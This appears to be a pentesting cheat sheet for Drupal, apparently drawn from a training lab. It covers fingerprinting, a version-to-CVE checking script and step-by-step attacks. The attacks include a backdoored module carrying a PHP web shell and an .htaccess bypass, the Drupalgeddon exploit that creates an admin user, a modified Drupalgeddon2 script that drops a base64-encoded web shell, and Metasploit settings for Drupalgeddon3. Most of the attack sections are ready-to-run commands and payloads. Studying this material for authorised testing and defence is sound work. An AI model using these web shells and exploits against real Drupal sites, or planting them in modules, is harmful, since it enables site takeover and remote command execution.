Pentesting Drupal

Drupal is written in PHP and supports using MySQL or PostgreSQL for the backend.

Important Drupal files and directories

A Drupal website can be identified in several ways, including by the header or footer message Powered by Drupal, the standard Drupal logo, the presence of a CHANGELOG.txt file or README.txt file, via the page source, or clues in the robots.txt file such as references to /node.

curl -s http://$target | grep Drupal

Another way to identify Drupal CMS is through nodes. Drupal indexes its content using nodes. A node can hold anything such as a blog post, poll, article, etc. The page URIs are usually of the form /node/<nodeid>.

Version

Reading the version from CHANGELOG.txt does not work on all versions:

curl -s http://$target/CHANGELOG.txt | grep -m2 ""
droopescan scan drupal --url http://$target

Make sure to check the CVEs associated with the identified version at: https://www.cvedetails.com/vulnerability-list/vendor_id-1367/product_id-2387/Drupal-Drupal.html
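As an added defensive check (not part of the original page), the script below parses the first line returned by the CHANGELOG.txt command above and maps the version onto the Drupalgeddon ranges stated later on this page; the Drupalgeddon3 fixed versions (7.59 and 8.5.3) are not on this page and are taken from the Drupal advisory SA-CORE-2018-004. The CHANGELOG sample is constructed.

```python
import re

# Affected ranges as stated on this page: (first affected, first fixed) per branch.
# Versions compare as tuples, so (8, 5) < (8, 5, 1) and 8.5.0 counts as affected.
AFFECTED = {
    "CVE-2014-3704 (Drupalgeddon)":  [((7, 0), (7, 32))],
    "CVE-2018-7600 (Drupalgeddon2)": [((7, 0), (7, 58)), ((8, 0), (8, 5, 1))],
    # Fixed versions for Drupalgeddon3 are not given on this page; they come
    # from Drupal advisory SA-CORE-2018-004 (7.59 and 8.5.3).
    "CVE-2018-7602 (Drupalgeddon3)": [((7, 0), (7, 59)), ((8, 0), (8, 5, 3))],
}

# Constructed sample of what `curl -s .../CHANGELOG.txt | grep -m2 ""` returns
# for a Drupal 7 site (the first two lines of the file).
SAMPLE_CHANGELOG_HEAD = "Drupal 7.31, 2014-07-23\n-----------------------\n"

def parse_version(changelog_head):
    """Return the version tuple from the first CHANGELOG.txt line, or None.
    None covers sites where the file is missing, returns a 404 page or
    uses a newer layout, which is why the page says the check is not universal."""
    m = re.search(r"^Drupal (\d+(?:\.\d+)+)", changelog_head, re.MULTILINE)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))

def affected_cves(version):
    """List the CVEs whose stated range contains `version`, in table order."""
    hits = []
    for cve, ranges in AFFECTED.items():
        for first, fixed in ranges:
            if first <= version < fixed:
                hits.append(cve)
                break
    return hits

def report(changelog_head):
    """One-line summary suitable for a scan log."""
    version = parse_version(changelog_head)
    if version is None:
        return "version not found in CHANGELOG.txt; try droopescan"
    label = ".".join(map(str, version))
    cves = affected_cves(version)
    if not cves:
        return f"Drupal {label}: not in any range listed on this page"
    return f"Drupal {label}: " + ", ".join(cves)

if __name__ == "__main__":
    print(report(SAMPLE_CHANGELOG_HEAD))
```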

Users

Drupal supports three types of users by default:

  • Administrator: This user has complete control over the Drupal website.
  • Authenticated User: These users can log in to the website and perform operations such as adding and editing articles based on their permissions.
  • Anonymous: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.

Leveraging the PHP Filter Module

Unlike some CMSs, obtaining a shell on a Drupal host via the admin console is not as easy as just editing a PHP file found within a theme or uploading a malicious PHP script.

In older versions of Drupal (before version 8), it was possible to log in as an admin and enable the PHP filter module, which "Allows embedded PHP code/snippets to be evaluated." From here, we could tick the check box next to the module and scroll down to Save configuration. Next, we could go to Content --> Add content and create a Basic page.

From version 8 onwards, the PHP Filter module is not installed by default. To leverage this functionality, we would have to install the module ourselves. Since we would be changing and adding something to the client's Drupal instance, we may want to check with them first. We'd start by downloading the most recent version of the module from the Drupal website.

wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

Once downloaded, go to Administration > Reports > Available updates.

From here, click on Browse, select the file from the directory we downloaded it to, and then click Install.

Uploading a Backdoored Module

Drupal allows users with appropriate permissions to upload a new module. A backdoored module can be created by adding a shell to an existing module.

1. Download the archive and extract its contents.

wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz

2. Create a PHP web shell named shell.php with the contents:

<?php
system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);
?>

3. Next, we need to create a .htaccess file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the /modules folder.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

4. The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive.

mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/

5. Assuming we have administrative access to the website, click on Manage and then Extend on the sidebar. Next, click on the + Install new module button, and we will be taken to the install page, such as http://drupal.inlanefreight.local/admin/modules/install. Browse to the backdoored Captcha archive and click Install.

Drupalgeddon

CVE-2014-3704, known as Drupalgeddon, affects versions 7.0 up to 7.31 and was fixed in version 7.32. This was a pre-authenticated SQL injection flaw that could be used to upload a malicious form or create a new admin user.

Download from: https://www.exploit-db.com/exploits/34992

# Add an admin user named hacker with password pwnd
python2.7 drupalgeddon.py -t http://target -u hacker -p pwnd

Once logged in as admin, try to obtain a shell.

Drupalgeddon2

CVE-2018-7600, also known as Drupalgeddon2, is a remote code execution vulnerability, which affects versions of Drupal prior to 7.58 and 8.5.1. The vulnerability occurs due to insufficient input sanitization during user registration, allowing system-level commands to be maliciously injected.

Download from: https://www.exploit-db.com/exploits/44448

python3 drupalgeddon2.py 

We can check quickly with cURL and see that the hello.txt file was indeed uploaded.

curl -s http://drupal-dev.inlanefreight.local/hello.txt

Now let's modify the script to gain remote code execution by uploading a malicious PHP file.

echo '<?php system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);?>' | base64

Output:

PD9waHAgc3lzdGVtKCRfR0VUW2ZlOGVkYmFiYzVjNWM5YjdiNzY0NTA0Y2QyMmIxN2FmXSk7Pz4K

Next, let's replace the echo command in the exploit script with a command to write out our malicious PHP script.

echo "PD9waHAgc3lzdGVtKCRfR0VUW2ZlOGVkYmFiYzVjNWM5YjdiNzY0NTA0Y2QyMmIxN2FmXSk7Pz4K" | base64 -d | tee hello.php

Now, run the script:

python3 drupalgeddon2.py 

And to get the reverse shell running, browse to:

http://drupal-dev.inlanefreight.local/hello.php?fe8edbabc5c5c9b7b764504cd22b17af=id

Drupalgeddon3

CVE-2018-7602, also known as Drupalgeddon3, is a remote code execution vulnerability that affects multiple versions of Drupal 7.x and 8.x. This flaw exploits improper validation in the Form API.

It requires a user to have the ability to delete a node. We can exploit this using Metasploit, but we must first log in and obtain a valid session cookie. Once we have the session cookie, we can set up the exploit module as follows.

msfconsole -q
use multi/http/drupal_drupageddon3
set rhosts 10.129.42.195
set VHOST drupal-acc.inlanefreight.local
set drupal_session SESS45ecfcb93a827c3e578eae161f280548=jaAPbanr2KhLkLJwo69t0UOkn2505tXCaEdu33ULV2Y
set DRUPAL_NODE 1
set LHOST 10.10.14.15
show options
run
Last update: 2025-02-05
Created: February 2, 2025 19:49:43